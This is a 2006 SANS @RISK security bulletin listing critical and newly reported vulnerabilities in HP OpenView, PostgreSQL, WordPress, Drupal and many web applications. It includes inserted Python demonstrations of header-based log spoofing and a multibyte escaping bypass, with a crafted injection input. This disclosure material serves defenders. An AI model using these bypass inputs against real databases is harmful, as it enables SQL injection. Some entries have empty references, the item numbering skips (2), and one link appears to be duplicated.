@RISK: The Consensus Security Vulnerability Alert

Volume: V, Issue: 21
May 29, 2006

HP OpenView and Symantec Antivirus users should update their software quickly.

@RISK is the SANS community's consensus bulletin summarizing the most important vulnerabilities and exploits identified during the past week and providing guidance on appropriate actions to protect your systems (PART I). It also includes a comprehensive list of all new vulnerabilities discovered in the past week (PART II).

Summary of the vulnerabilities reported this week:

    Category                                   # of Updates & Vulnerabilities
    Third Party Windows Apps                   6
    Mac OS                                     1
    Linux                                      4
    HP-UX                                      2
    Unix                                       3
    Cross Platform                             9 (#1, #2, #3, #6)
    Web Application - Cross Site Scripting     7
    Web Application - SQL Injection            3
    Web Application                            23 (#4, #5)

***************** Sponsored By Blue Coat Systems, Inc. *****************

New eBook: SSL VPN Lessons Learned

Learn how to get the most out of SSL VPNs. Honest, technical, and to-the-point, this eBooklet, by analyst Don Jones, discusses what SSL VPNs promised, how they originally failed to deliver, and why the technology is making a comeback. He'll answer your questions, explain the technology, and set you on the path to success. Learn more.

http://www.sans.org/info.php?id=1176

*************************************************************************

Table Of Contents
Part II -- Comprehensive List of Newly Discovered Vulnerabilities from Qualys (www.qualys.com)
Third Party Windows Apps
Mac Os
Linux
HP-UX
Unix
Cross Platform
Web Application - Cross Site Scripting
Web Application - SQL Injection
Web Application

*************************************************************************

SECURITY TRAINING UPDATE FOR JUNE and JULY, 2006

Washington DC: 18 tracks

Denver: 6 tracks

London: 5 tracks

Toronto: 4 tracks

Plus 10 other cities and live-online programs you can take from your home.

See http://www.sans.org/ for the course schedule and registration

*************************************************************************

PART I Critical Vulnerabilities

Part I is compiled by Rob King at TippingPoint, a division of 3Com, as a by-product of that company's continuous effort to ensure that its intrusion prevention products effectively block exploits using known vulnerabilities. TippingPoint's analysis is complemented by input from a council of security managers from twelve large organizations who confidentially share with SANS the specific actions they have taken to protect their systems. A detailed description of the process may be found at http://www.sans.org/newsletters/cva/index.php#process

Widely Deployed Software
  • (1) CRITICAL: HP OpenView Multiple Remote Command Execution
  • Affected: HP OpenView Storage Data Protector Versions 5.1 and 5.5
    • HP OpenView Network Node Manager Versions 6.20, 6.4x, 7.01, and 7.50
  • Description: HP OpenView, a popular enterprise system management and monitoring solution, is vulnerable to several undisclosed remote command execution vulnerabilities due to improperly-validated input. Both the Network Node Manager (system monitoring and management) and Storage Data Protector (backup and data management) products are affected. Users are advised to block access to these systems from the Internet and other untrusted hosts. Note that these products often run with privileged access.

  • Status: HP confirmed, patches released.

  • Council Site Actions: The responding council sites using the affected software have notified their respective support teams and plan to deploy the patches during their next regularly scheduled system update. They also block OpenView access at their network security perimeters.

  • References:
  • (3) MODERATE: FreeType Font File Handling Integer Overflow
  • Affected: FreeType version 2.2 and prior
  • Description: FreeType is an Open Source font engine widely deployed with Linux and Unix-based operating systems. Versions 2.2 and prior are vulnerable to several integer overflows when processing specially-crafted font files. By tricking a user into accessing such a font file, an attacker could execute remote code with the privileges of the vulnerable user. Note that, based on configuration, no user interaction beyond downloading the file may be necessary. Users are advised to not open any font files from untrusted sources and to upgrade to the latest version of the affected software.

  • Status: FreeType confirmed. Updates available.

  • Council Site Actions: One of the reporting council sites has the affected software installed on several hundred Linux systems. Most of their Debian GNU/Linux systems already have the new version (i.e., version 2.2.1-2 of the freetype package). They are awaiting release of a Red Hat Enterprise Linux patch.

  • References:
  • (4) MODERATE: Drupal Arbitrary Remote File Execution
  • Affected: Drupal versions 4.6.7, 4.7.0 and prior.
  • Description: Drupal is a popular and widely-deployed Open Source content management application. Under a typical configuration of Drupal with Apache, Drupal is vulnerable to an arbitrary file execution vulnerability. By sending a specially-crafted request, an attacker is able to instruct Drupal to execute a file located in the "files" directory. Drupal is commonly configured to allow remote users to upload files, and an attacker can therefore inject code via an uploaded file. Users are encouraged to disable file uploading and update to the latest version of the affected software. Note that technical details and a proof-of-concept have been publicly posted.

  • Status: Drupal confirmed, updates released.

  • Council Site Actions: The affected software and/or configuration are not in production or widespread use, or are not officially supported at any of the council sites.

  • References:
  • (5) MODERATE: WordPress Remote Command Execution
  • Affected: WordPress version 2.0.2 and prior.
  • Description: WordPress is a popular blogging and content management system written in PHP. Versions 2.0.2 and prior are vulnerable to a remote command execution vulnerability and an IP spoofing attack. By sending a specially-crafted request to the server hosting WordPress, an attacker could cause the server to execute arbitrary commands with the privileges of the webserver process. Only servers that allow open user registration or open modification of account information are affected. Separately, due to a flaw in the processing of client request headers, an attacker can spoof the source IP recorded in the WordPress logs; the hosting webserver's own logs should remain unaffected. Technical details and a proof-of-concept are available for the remote code execution vulnerability. Users are advised to disallow anonymous user registration.

  • Status: WordPress has not confirmed, no updates are available.

  • References:
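The log spoofing in item (5) comes from trusting a client-supplied request header over the address the connection actually came from. The following added example (not WordPress code) contrasts that pattern with a resolver that honours a forwarding header only when the TCP peer is a known proxy; the header name X-Forwarded-For, the proxy ranges and the function names are assumptions made for the demonstration.

```python
import ipaddress

# Assumption (constructed for this example): only these addresses are
# reverse proxies that legitimately append X-Forwarded-For. Every other
# peer is talking to the application directly.
TRUSTED_PROXIES = [
    ipaddress.ip_network("10.0.0.0/8"),
    ipaddress.ip_network("192.0.2.10/32"),
]


def _is_trusted_proxy(addr) -> bool:
    return any(addr in net for net in TRUSTED_PROXIES)


def naive_client_ip(remote_addr: str, headers: dict) -> str:
    """The pattern behind the log-spoofing issue: a client-controlled header
    is preferred over the TCP peer address, so whatever the client writes
    into the header is what the application logs."""
    forwarded = headers.get("X-Forwarded-For")
    if forwarded:
        return forwarded.split(",")[0].strip()
    return remote_addr


def client_ip(remote_addr: str, headers: dict) -> str:
    """Address to record in logs and use for rate limiting.

    X-Forwarded-For is honoured only when the TCP peer is a trusted proxy.
    The chain is then walked from the right, skipping our own proxies, so a
    client cannot prepend a fake hop. A malformed entry makes us fall back
    to the socket address rather than log attacker-chosen text."""
    peer = ipaddress.ip_address(remote_addr)
    if not _is_trusted_proxy(peer):
        return remote_addr
    raw = headers.get("X-Forwarded-For", "")
    hops = [h.strip() for h in raw.split(",") if h.strip()]
    for hop in reversed(hops):
        try:
            addr = ipaddress.ip_address(hop)
        except ValueError:
            return remote_addr
        if not _is_trusted_proxy(addr):
            return str(addr)
    return remote_addr


if __name__ == "__main__":
    # Constructed requests: a direct client claiming to be someone else,
    # and a request relayed through a trusted proxy.
    direct = ("203.0.113.5", {"X-Forwarded-For": "1.2.3.4"})
    relayed = ("10.1.1.1", {"X-Forwarded-For": "1.2.3.4, 198.51.100.7"})
    for peer, hdrs in (direct, relayed):
        print(f"peer={peer} naive={naive_client_ip(peer, hdrs)} "
              f"checked={client_ip(peer, hdrs)}")
```

The webserver's own access log is unaffected by the header for the same reason the checked version is: it records the socket peer, which the client cannot choose.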
  • (6) LOW: PostgreSQL Multibyte Encoding Security Bypass and SQL Injection
  • Affected: PostgreSQL versions 8.1.4, 8.0.8, 7.4.13, 7.3.15 and prior.
  • Description: PostgreSQL is an extremely popular and widely-deployed Open Source SQL database system. It also forms the basis of several other widely-deployed database engines, including RedHat's RedHat Database. The server suffers from a potential SQL injection and security bypass vulnerability due to a failure to properly validate multibyte character encodings when interacting with non-encoding-aware client-side applications. Specifically, when used with applications that treat multibyte characters as single characters, an attacker can submit specially-crafted multibyte strings to the server, which will interpret them as valid SQL commands. Note that most client applications are not encoding-aware and are therefore open to this vulnerability. Injected SQL commands will be run with the privileges of the client application on the server. Technical details for this vulnerability have been posted and simple proofs-of-concept are available.

  • Status: PostgreSQL confirmed, updates available.

  • Council Site Actions: At the reporting council sites the affected application is not used for any central IT services. The sites are still assessing whether their deployed configurations have a chance of exploitation.

  • References:
Other Software
  • (7) UPDATE: Metasploit 2.6 Released
  • Description: Metasploit is a popular Open Source platform for developing and deploying security exploits. Version 2.6 of this platform has been released, and contains 143 exploits, 43 new since the last release. Many of these exploits are for still-current vulnerabilities.

  • References:
Part II: Weekly Comprehensive List of Newly Discovered Vulnerabilities
Week 21, 2006

This list is compiled by Qualys (www.qualys.com) as part of that company's ongoing effort to ensure its vulnerability management web service tests for all known vulnerabilities that can be scanned. As of this week Qualys scans for 5014 unique vulnerabilities. For this special SANS community listing, Qualys also includes vulnerabilities that cannot be scanned remotely.


  • 06.21.1 - CVE: Not Available
  • Platform: Third Party Windows Apps
  • Title: EMC Retrospect Client Buffer Overflow
  • Description: Retrospect is a backup management application for enterprise networks. Retrospect Client for Windows is prone to a remote buffer overflow vulnerability. The problem presents itself when malicious data is sent to the listening port of the client application. Retrospect version 7.5 Client for Windows is reported to be vulnerable.
  • Ref: http://www.securityfocus.com/bid/18072

  • 06.21.2 - CVE: Not Available
  • Platform: Third Party Windows Apps
  • Title: BitZipper Remote Directory Traversal
  • Description: BitZipper is a file-archiving and compression application. It is affected by a directory traversal issue when it processes malicious TAR, ZIP, TAR.GZ, GZ or JAR archives. All current versions are affected.
  • Ref: http://www.securityfocus.com/bid/18065

  • 06.21.3 - CVE: Not Available
  • Platform: Third Party Windows Apps
  • Title: Skype Technologies Skype URI Handling Remote File Download
  • Description: Skype from Skype Technologies is peer-to-peer communications software that provides for Internet-based voice communications. Skype is prone to an arbitrary file download vulnerability. This issue is due to improper Skype URI handling. This issue is triggered by specially crafted, malformed Skype URIs. If an unsuspecting user follows these URIs, Skype will be launched, and an attacker-specified file will automatically be downloaded from the victim user's computer to the attacker. This issue allows remote attackers to transfer files from one Skype user to another, provided the recipient user has previously approved downloads.
  • Ref: http://www.skype.com/security/skype-sb-2006-001.html

  • 06.21.4 - CVE: CVE-2006-2494
  • Platform: Third Party Windows Apps
  • Title: IntelliTamper Map Files Buffer Overflow
  • Description: IntelliTamper is an application for scanning web sites. It is vulnerable to a buffer overflow issue when a malicious site map file ".map" with an overly long line is opened. IntelliTamper version 2.07 is vulnerable.
  • Ref: http://www.milw0rm.com/exploits/1806

  • 06.21.5 - CVE: Not Available
  • Platform: Third Party Windows Apps
  • Title: Cisco VPN Client Local Privilege Escalation
  • Description: Cisco VPN Client is a virtual private network (VPN) client application. It is vulnerable to a local privilege escalation issue due to an unspecified flaw in the VPN client dialer application. Cisco VPN Client versions earlier than 4.8.01.x on Microsoft Windows are vulnerable.
  • Ref: http://www.securityfocus.com/archive/1/434934

  • 06.21.6 - CVE: Not Available
  • Platform: Third Party Windows Apps
  • Title: Symantec Antivirus Remote Unspecified Code Execution
  • Description: Symantec Antivirus is susceptible to an unspecified remote code execution issue which allows remote attackers to execute arbitrary machine code with SYSTEM-level privileges. Symantec Antivirus version 10 is affected.
  • Ref: http://www.securityfocus.com/bid/18107

  • 06.21.7 - CVE: Not Available
  • Platform: Mac Os
  • Title: Apple Xcode Tools WebObjects Unauthorized Remote Access
  • Description: Xcode Tools is prone to an unauthorized remote access vulnerability through the WebObjects plug-in. By design the WebObjects plug-in provides the ability to manipulate projects through a network service. However, the service is accessible by remote users when Xcode is running. This issue only affects systems with the Xcode Tools WebObjects plug-in installed.
  • Ref: http://www.securityfocus.com/bid/18091

  • 06.21.8 - CVE: Not Available
  • Platform: Linux
  • Title: Linux Kernel SNMP NAT Helper Remote Denial of Service
  • Description: The Linux SNMP NAT helper is susceptible to a remote denial of service vulnerability. This issue arises in the "snmp_trap_decode()" function when certain SNMP packets are processed. Specifically, the application improperly frees memory under various circumstances and crashes when the "ip_nat_snmp_basic" module is loaded and NAT is enabled on TCP ports 161 or 162. Kernel versions prior to 2.6.16.18 are vulnerable to this issue.
  • Ref: http://www.securityfocus.com/bid/18089/references

  • 06.21.9 - CVE: CVE-2006-1858, CVE-2006-1857
  • Platform: Linux
  • Title: Linux Kernel SCTP Multiple Remote Denial of Service Vulnerabilities
  • Description: The Linux kernel SCTP module is vulnerable to multiple remote denial of service issues when the kernel handles unexpected SCTP packets. The Linux kernel versions 2.6.16 and earlier are vulnerable.
  • Ref: http://kernel.org/pub/linux/kernel/v2.6/ChangeLog-2.6.16.17

  • 06.21.10 - CVE: Not Available
  • Platform: Linux
  • Title: Linux Kernel Choose_New_Parent Local Denial of Service
  • Description: The Linux kernel is prone to a local denial of service vulnerability. This issue is due to a design error in the "choose_new_parent" function. This vulnerability allows local users to cause a kernel panic, denying further service to legitimate users. This issue affects Linux kernel versions prior to 2.6.11.12.
  • Ref: http://www.securityfocus.com/bid/18099

  • 06.21.11 - CVE: CVE-2006-1528
  • Platform: Linux
  • Title: Linux Kernel SG Driver Direct IO Local Denial of Service
  • Description: The Linux kernel is prone to a local denial of service vulnerability. This issue is due to a design error in the SG driver. This issue presents itself when direct IO mixed with memory-mapped files is performed on SG devices. This causes a kernel panic due to unexpectedly empty entries in the scatter-gather list. This issue affects Linux kernel versions prior to 2.6.13.
  • Ref: http://marc.theaimsgroup.com/?l=linux-scsi&m=112540053711489&w=2

  • 06.21.12 - CVE: Not Available
  • Platform: HP-UX
  • Title: HP-UX Kernel Unspecified Local Denial of Service
  • Description: The HP-UX kernel is prone to an unspecified local denial of service vulnerability. The vendor has reported a local authorized user can cause denial of service conditions in the kernel.
  • Ref: http://www.securityfocus.com/bid/18057

  • 06.21.13 - CVE: Not Available
  • Platform: HP-UX
  • Title: HP-UX Software Distributor Unspecified Local Privilege Escalation
  • Description: HP-UX Software Distributor is susceptible to an unspecified local privilege escalation vulnerability. This issue allows local attackers to gain administrative privileges on affected computers.
  • Ref: http://www.securityfocus.com/bid/18098

  • 06.21.14 - CVE: Not Available
  • Platform: Unix
  • Title: Prodder Arbitrary Shell Command Execution
  • Description: Prodder is a perl podcatcher script. It automates downloading RSS2 enclosures. Prodder is prone to an arbitrary command execution vulnerability. This issue occurs when the application extracts the URL of an audio file from the XML file a server provides.
  • Ref: http://www.redteam-pentesting.de/advisories/rt-sa-2006-002.txt

  • 06.21.15 - CVE: Not Available
  • Platform: Unix
  • Title: KPhone Local Information Disclosure
  • Description: KPhone is a voice-over-internet phone implementation. The "kphonerc" configuration file is created with world-readable permission which contains SIP phone passwords and configuration information. KPhone version 4.2 is affected.
  • Ref: http://www.securityfocus.com/bid/18049

  • 06.21.16 - CVE: CVE-2006-2502
  • Platform: Unix
  • Title: Cyrus IMAPD POP3D Remote Buffer Overflow
  • Description: Cyrus IMAPD is an open-source Interactive Mail Access Protocol (IMAP) daemon. It is vulnerable to a remote buffer overflow issue due to insufficient sanitization of POP3D USER commands. Cyrus IMAPD version 2.3.2 is vulnerable.
  • Ref: http://archives.neohapsis.com/archives/fulldisclosure/2006-05/0527.html

  • 06.21.17 - CVE: CVE-2006-2550, CVE-2006-2548
  • Platform: Cross Platform
  • Title: Perlpodder Arbitrary Shell Command Execution
  • Description: Perlpodder is a perl podcatcher script. It automates downloading RSS2 enclosures. It is prone to an arbitrary command execution vulnerability. This issue occurs when the application extracts the URL of an audio file from the XML file a server provides. The application does not properly sanitize the data before using it in a system() command. Perlpodder version 0.4 is affected.
  • Ref: http://www.securityfocus.com/bid/18067

  • 06.21.18 - CVE: Not Available
  • Platform: Cross Platform
  • Title: Sun Java Runtime Environment Nested Array Objects Denial of Service
  • Description: The Sun Java Runtime Environment is vulnerable to a denial of service vulnerability. This issue is due to a failure of the process to handle exceptional conditions when dealing with nested array objects. This issue is reported to affect Java Runtime Environment versions up to 1.4.2_11 and 1.5.0_06. This issue will crash Internet browsers running an affected Java plug-in.
  • Ref: http://www.securityfocus.com/bid/18058

  • 06.21.19 - CVE: Not Available
  • Platform: Cross Platform
  • Title: Multiple Browsers Exception Handling Information Disclosure
  • Description: Multiple browsers are prone to an information disclosure vulnerability. The problem occurs during exception handling in "nsSidebar.js" when viewing malformed pages. When an exception occurs the data sent to the server includes the full installation directory of the client application. Please visit the referenced link for more details.
  • Ref: http://www.securityfocus.com/bid/18083

  • 06.21.20 - CVE: Not Available
  • Platform: Cross Platform
  • Title: Dia Filename Remote Format String
  • Description: Dia is a gtk-based program for creating diagrams. Insufficient sanitization in the "gtk_message_dialog_new()" function of the "lib/message.c" file exposes it to a remote format string issue. Dia versions 0.95 and earlier are affected.
  • Ref: http://www.securityfocus.com/bid/18078

  • 06.21.21 - CVE: CVE-2006-2539
  • Platform: Cross Platform
  • Title: Sybase EAServer J2EE Application Clients and Java GUI Applications Password Disclosure
  • Description: Sybase EAServer is an open application server for hosting business applications. Sybase EAServer may expose passwords through GUI applications. A local user could exploit this vulnerability to view another user's password. The problem occurs because the "get_SelectedText()" method of "javax.swing.JPasswordField" UI component returns cleartext passwords. An attacker can exploit this issue to retrieve the contents of a password field in a currently open GUI dialog box or to retrieve the contents of a local file (if the component is used to store passwords in that file). EAServer versions 5.0, 5.2 and 5.3 are vulnerable to this issue.
  • Ref: http://www.sybase.com/detail?id=1040665

  • 06.21.22 - CVE: Not Available
  • Platform: Cross Platform
  • Title: CScope Include Filename Buffer Overflow
  • Description: Cscope is a free C source code browsing and analysis tool. It is prone to a buffer overflow vulnerability. The overflow occurs when the application is used to scan a C file with an overly long "#include" directive.
  • Ref: http://www.securityfocus.com/bid/18050

  • 06.21.23 - CVE: CVE-2006-2314, CVE-2006-2313
  • Platform: Cross Platform
  • Title: PostgreSQL Multibyte Character Encoding SQL Injection Vulnerabilities
  • Description: PostgreSQL is an open-source relational database suite. PostgreSQL is prone to SQL injection vulnerabilities. These issues are due to a potential mismatch of multibyte-character conversions between PostgreSQL servers and client applications. Attackers may exploit the first issue by including invalid multibyte characters to bypass standard string-escape methods. Attackers can exploit the second issue in certain circumstances when database-using applications use the non-standard "\" (backslash) character to escape the single quote character, rather than the SQL-standard "''" (doubled quote) escaping method. PostgreSQL versions prior to 7.3.15, 7.4.13, 8.0.8, and 8.1.4 are vulnerable to these issues.
  • Ref: http://www.postgresql.org/docs/techdocs.50
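An added example (not code from the advisory or from PostgreSQL) illustrating the mismatch described in item (6) of Part I and in 06.21.23 above: a client library that escapes one byte at a time, against a server that decodes the query text in a multibyte encoding. The Shift_JIS connection encoding, the input bytes and the function names are assumptions made for the demonstration. The encoding-aware escaper shows the mitigation the advisory points to: reject byte sequences that are not valid characters in the connection encoding, and use the SQL-standard '' doubling rather than backslashes.

```python
# Assumption: the connection encoding is Shift_JIS, in which 0x5C (ASCII
# backslash) is a legal second byte of a two-byte character.
SERVER_ENCODING = "shift_jis"


def escape_bytewise(value: bytes) -> bytes:
    """Non-encoding-aware escaping: put a backslash before every ' and \\
    byte, without asking whether that byte is part of a multibyte character.
    This is the client behaviour the advisory warns about."""
    out = bytearray()
    for b in value:
        if b in (0x27, 0x5C):          # ' or \
            out.append(0x5C)
        out.append(b)
    return bytes(out)


def server_view(literal: bytes) -> str:
    """Decode the escaped bytes the way the server does. errors='replace'
    keeps undecodable bytes visible instead of raising."""
    return literal.decode(SERVER_ENCODING, errors="replace")


def unescaped_quotes(text: str) -> int:
    """Count single quotes not preceded by a backslash character, i.e. quotes
    that still terminate a string literal from the server's point of view."""
    return sum(
        1 for i, ch in enumerate(text)
        if ch == "'" and (i == 0 or text[i - 1] != "\\")
    )


def escape_encoding_aware(value: bytes) -> bytes:
    """Mitigation: decode strictly in the connection encoding, so any byte
    sequence that is not a complete, valid character is rejected, then use
    the SQL-standard '' doubling instead of backslashes."""
    try:
        text = value.decode(SERVER_ENCODING)
    except UnicodeDecodeError as exc:
        raise ValueError(f"invalid {SERVER_ENCODING} input: {exc.reason}") from exc
    return text.replace("'", "''").encode(SERVER_ENCODING)


def is_rejected(value: bytes) -> bool:
    """True if the encoding-aware escaper refuses the input."""
    try:
        escape_encoding_aware(value)
    except ValueError:
        return True
    return False


# Constructed inputs: an ordinary name, and a lone Shift_JIS lead byte (0x81)
# followed directly by an ASCII quote, which is not a valid character.
BENIGN = b"O'Reilly"
TRUNCATED_MULTIBYTE = b"\x81'"

if __name__ == "__main__":
    for label, value in (("benign", BENIGN), ("truncated lead byte", TRUNCATED_MULTIBYTE)):
        seen = server_view(escape_bytewise(value))
        print(f"{label}: server sees {seen!r}, unescaped quotes = {unescaped_quotes(seen)}")
        if is_rejected(value):
            print("  encoding-aware escaper: rejected")
        else:
            print(f"  encoding-aware escaper: {escape_encoding_aware(value)!r}")
```

Run directly, the output shows the byte-wise escaper's backslash being absorbed as the trail byte of a two-byte character, leaving the quote standing, while strict decoding refuses the input before any SQL text is built. Parameterized queries, which keep data out of the SQL text entirely, sidestep the problem without depending on escaping at all.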

  • 06.21.24 - CVE: Not Available
  • Platform: Cross Platform
  • Title: HP OpenView Storage Data Protector Remote Arbitrary Command Execution
  • Description: HP OpenView Storage Data Protector is a data management product for backup and recovery operations. It is affected by a remote command execution issue. All current versions are affected.
  • Ref: http://www.securityfocus.com/bid/18095

  • 06.21.25 - CVE: CVE-2006-2575
  • Platform: Cross Platform
  • Title: NetPanzer SETFRAME Remote Denial of Service
  • Description: NetPanzer is an online multiplayer tactical warfare game. NetPanzer is affected by a remote denial of service vulnerability. NetPanzer 0.8 (rev 952) and prior versions are affected by this issue.
  • Ref: http://www.securityfocus.com/archive/1/434908

  • 06.21.26 - CVE: CVE-2006-2518
  • Platform: Web Application - Cross Site Scripting
  • Title: PHPWCMS CNT6.INC.PHP Cross-Site Scripting
  • Description: PHPWCMS is a web-based content management application implemented in PHP. It is prone to a cross-site scripting vulnerability. This issue affects version 1.2.5-DEV.
  • Ref: http://www.kapda.ir/advisory-331.html

  • 06.21.27 - CVE: CVE-2006-0222
  • Platform: Web Application - Cross Site Scripting
  • Title: AlstraSoft E-Friends Multiple HTML Injection Vulnerabilities
  • Description: E-Friends is a web-based social networking application implemented in PHP. It is prone to multiple HTML injection vulnerabilities. All versions are considered to be vulnerable at the moment.
  • Ref: http://www.securityfocus.com/archive/1/434846

  • 06.21.28 - CVE: Not Available
  • Platform: Web Application - Cross Site Scripting
  • Title: Hscripts HGB Index.PHP Cross-Site Scripting
  • Description: Hscripts HGB is a web-based guestbook application. It is vulnerable to a cross-site scripting issue due to insufficient sanitization of user-supplied input to various scripts. Hscripts HGB version 3.1 is vulnerable.
  • Ref: http://www.securityfocus.com/archive/1/434686

  • 06.21.29 - CVE: Not Available
  • Platform: Web Application - Cross Site Scripting
  • Title: Captivate Gallery.PHP Cross-Site Scripting
  • Description: Captivate is a web-based gallery application. It is prone to a cross-site scripting vulnerability due to insufficient sanitization of user-supplied input to the "page" parameter of the "gallery.php" script. This issue affects version 1.0.
  • Ref: http://www.securityfocus.com/bid/18072

  • 06.21.30 - CVE: Not Available
  • Platform: Web Application - Cross Site Scripting
  • Title: Another Image Gallery Cross-Site Scripting
  • Description: Another Image Gallery is affected by a cross-site scripting issue due to insufficient sanitization of the "alt" and "columns" parameters of the "gallery.php" script. All current versions are affected.
  • Ref: http://www.securityfocus.com/bid/18073

  • 06.21.31 - CVE: Not Available
  • Platform: Web Application - Cross Site Scripting
  • Title: phpRaid View.PHP Cross-Site Scripting
  • Description: phpRaid is a raid-management system for the game World of Warcraft; it is implemented in PHP. phpRaid is prone to a cross-site scripting vulnerability. This issue affects phpRaid version 2.9.5.
  • Ref: http://www.securityfocus.com/archive/1/434736

  • 06.21.32 - CVE: Not Available
  • Platform: Web Application - Cross Site Scripting
  • Title: DSChat HTML Injection
  • Description: DSChat is a web-based chat application implemented in PHP. DSChat is prone to an HTML injection vulnerability.
  • Ref: http://www.securityfocus.com/archive/1/434821

  • 06.21.33 - CVE: Not Available
  • Platform: Web Application - SQL Injection
  • Title: Woltlab Burning Board Links.PHP SQL Injection
  • Description: Woltlab Burning Board is a web-based bulletin-board package. It is vulnerable to an SQL injection issue due to insufficient sanitization of user-supplied input to the "cat" parameter of the "links.php" script. Woltlab Burning Board versions 2.3.4 and earlier are vulnerable.
  • Ref: http://www.milw0rm.com/exploits/1810

  • 06.21.34 - CVE: Not Available
  • Platform: Web Application - SQL Injection
  • Title: JemWeb DownloadControl DC.PHP SQL Injection
  • Description: DownloadControl is a web-based download manager. It is prone to an SQL injection vulnerability due to insufficient sanitization of user-supplied input to the "dcid" parameter of the "dc.php" script. DownloadControl version 1.0 is reported to be vulnerable.
  • Ref: http://www.securityfocus.com/bid/18041

  • 06.21.35 - CVE: Not Available
  • Platform: Web Application - SQL Injection
  • Title: ZixForum Settings.ASP SQL Injection
  • Description: ZixForum is a web-log application. Insufficient sanitization of the "layid" parameter of the "settings.asp" script exposes the application to an SQL injection issue. ZixForum version 1.12 and earlier are affected.
  • Ref: http://www.securityfocus.com/bid/18043

  • 06.21.36 - CVE: Not Available
  • Platform: Web Application
  • Title: Nagios Remote Content-Length Integer Overflow
  • Description: Nagios is an open-source application designed to monitor networks and services. It is affected by an integer overflow issue due to insufficient sanitization of the "Content-Length" HTTP request header. Nagios versions prior to 2.3.1 are affected.
  • Ref: http://www.securityfocus.com/bid/18059

  • 06.21.37 - CVE: CVE-2006-2498
  • Platform: Web Application
  • Title: Power Place PHP Easy Galerie Index.PHP Remote File Include
  • Description: PHP Easy Galerie is a web-based gallery application implemented in PHP. It is prone to a remote file include vulnerability. All current versions are affected.
  • Ref: http://www.securityfocus.com/archive/1/434695

  • 06.21.38 - CVE: CVE-2006-2516
  • Platform: Web Application
  • Title: XOOPS Mainfile.PHP Local File Include
  • Description: XOOPS is an extensible, dynamic web content management system. It is vulnerable to a local file include issue because the "xoopsOption['nocommon']" parameter is not properly checked for the presence of directory-traversal sequences. XOOPS versions 2.0.13.2 and earlier are vulnerable.
  • Ref: http://www.securityfocus.com/archive/1/434698

  • 06.21.39 - CVE: Not Available
  • Platform: Web Application
  • Title: phpwcms Spaw_Control.Class.PHP Local File Include
  • Description: phpwcms is a web-based content management application. Insufficient sanitization of the "../" directory traversal sequence in the "spaw_root" parameter of the "spaw_control.class.php" file exposes the application to a local file include issue. phpwcms version 1.2.5-DEV is affected.
  • Ref: http://www.securityfocus.com/bid/18062

  • 06.21.40 - CVE: Not Available
  • Platform: Web Application
  • Title: Chatty Username HTML Injection
  • Description: Chatty is a web-based chat application. It is exposed to an HTML injection issue due to insufficient sanitization of user-supplied input. All current versions are affected.
  • Ref: http://www.securityfocus.com/bid/18082

  • 06.21.41 - CVE: Not Available
  • Platform: Web Application
  • Title: Destiney Rated Images Addweblog.PHP HTML Injection
  • Description: Destiney Rated Images is a gallery script. Insufficient sanitization of user-supplied input to the "addweblog.php" and "leavecomments.php" scripts exposes the application to an HTML injection issue. Destiney Rated Images Version 0.5.0 is affected.
  • Ref: http://www.securityfocus.com/bid/18070

  • 06.21.42 - CVE: CVE-2006-2536
  • Platform: Web Application
  • Title: Destiney Links Script Multiple HTML Injection Vulnerabilities
  • Description: Destiney Links Script is a PHP application for monitoring and managing remote links. Destiney Links Script is prone to multiple HTML injection vulnerabilities. These issues affect version 2.1.2.
  • Ref: http://www.securityfocus.com/archive/1/434692

  • 06.21.43 - CVE: Not Available
  • Platform: Web Application
  • Title: UBB.threads Addpost_newpoll.PHP Remote File Include
  • Description: UBB.threads is a web-based forum application. It is prone to a remote file include vulnerability due to insufficient sanitization of user-supplied input to the "thispath" variable of "addpost_newpoll.php". UBB.threads versions 6.5.2 and earlier are affected.
  • Ref: http://www.securityfocus.com/bid/18075

  • 06.21.44 - CVE: CVE-2006-2570
  • Platform: Web Application
  • Title: CaLogic Calendars Multiple Remote File Include Vulnerabilities
  • Description: CaLogic Calendars is a web-based calendar application written in PHP. CaLogic Calendars is prone to multiple remote file include vulnerabilities. CaLogic Calendars 1.2.2 is reported to be vulnerable.
  • Ref: http://www.milw0rm.com/exploits/1809

  • 06.21.45 - CVE: Not Available
  • Platform: Web Application
  • Title: YourFreeWorld Stylish Text Ads Script Multiple HTML Injection Vulnerabilities
  • Description: Stylish Text Ads Script is a PHP application for selling and distributing web-based ads. It is prone to multiple HTML injection vulnerabilities due to insufficient sanitization of user-supplied input to the "advertise.php" script.
  • Ref: http://www.securityfocus.com/bid/18044

  • 06.21.46 - CVE: Not Available
  • Platform: Web Application
  • Title: Artmedic Newsletter Log.PHP Remote Script Execution
  • Description: Artmedic Newsletter is a web-based newsletter application. It is vulnerable to a remote PHP code execution issue due to insufficient sanitization of user-supplied input to the "email" and "logfile" parameters. Artmedic Newsletter version 4.1 is vulnerable.
  • Ref: http://www.securityfocus.com/archive/1/434738

  • 06.21.47 - CVE: Not Available
  • Platform: Web Application
  • Title: YourFreeWorld Short Url & Url Tracker Script Multiple HTML Injection Vulnerabilities
  • Description: Short Url & Url Tracker Script is an ASP application for managing and acquiring short URLs. Short Url & Url Tracker Script is prone to multiple HTML injection vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
  • Ref: http://www.securityfocus.com/archive/1/434530

  • 06.21.48 - CVE: Not Available
  • Platform: Web Application
  • Title: phpBazar Classified_right.PHP Remote File Include
  • Description: phpBazar is a web-based classified ad and match-making application implemented in PHP. Insufficient sanitization of the "language_dir" parameter of the "classified_right.php" script exposes the application to a remote file include issue.
  • Ref: http://www.securityfocus.com/bid/18052

  • 06.21.49 - CVE: Not Available
  • Platform: Web Application
  • Title: phpBazar Admin.PHP Unauthorized Access
  • Description: phpBazar is a web-based classified ad and match making application. It is prone to an unauthorized access vulnerability due to insufficient sanitization of user-supplied credentials before granting access to sensitive scripts.
  • Ref: http://www.securityfocus.com/bid/18053

  • 06.21.50 - CVE: CVE-2006-2545, CVE-2006-2544, CVE-2006-2543
  • Platform: Web Application
  • Title: Xtreme Topsites Multiple Input Validation Vulnerabilities
  • Description: Xtreme Topsites is a top sites script implemented in PHP. Xtreme Topsites is prone to multiple input-validation vulnerabilities because the application fails to properly sanitize user-supplied input.
  • Ref: http://www.securityfocus.com/archive/1/434568

  • 06.21.51 - CVE: Not Available
  • Platform: Web Application
  • Title: ipLogger Useragent HTML Injection
  • Description: ipLogger is a web-based application that records each visitor's IP address, referer and browser. Insufficient sanitization of the "useragent" parameter (the value of the browser's User-Agent header, which is attacker-controlled like any other request input) exposes the application to an HTML injection issue. ipLogger version 1.7 is affected.
  • Ref: http://www.securityfocus.com/bid/18086

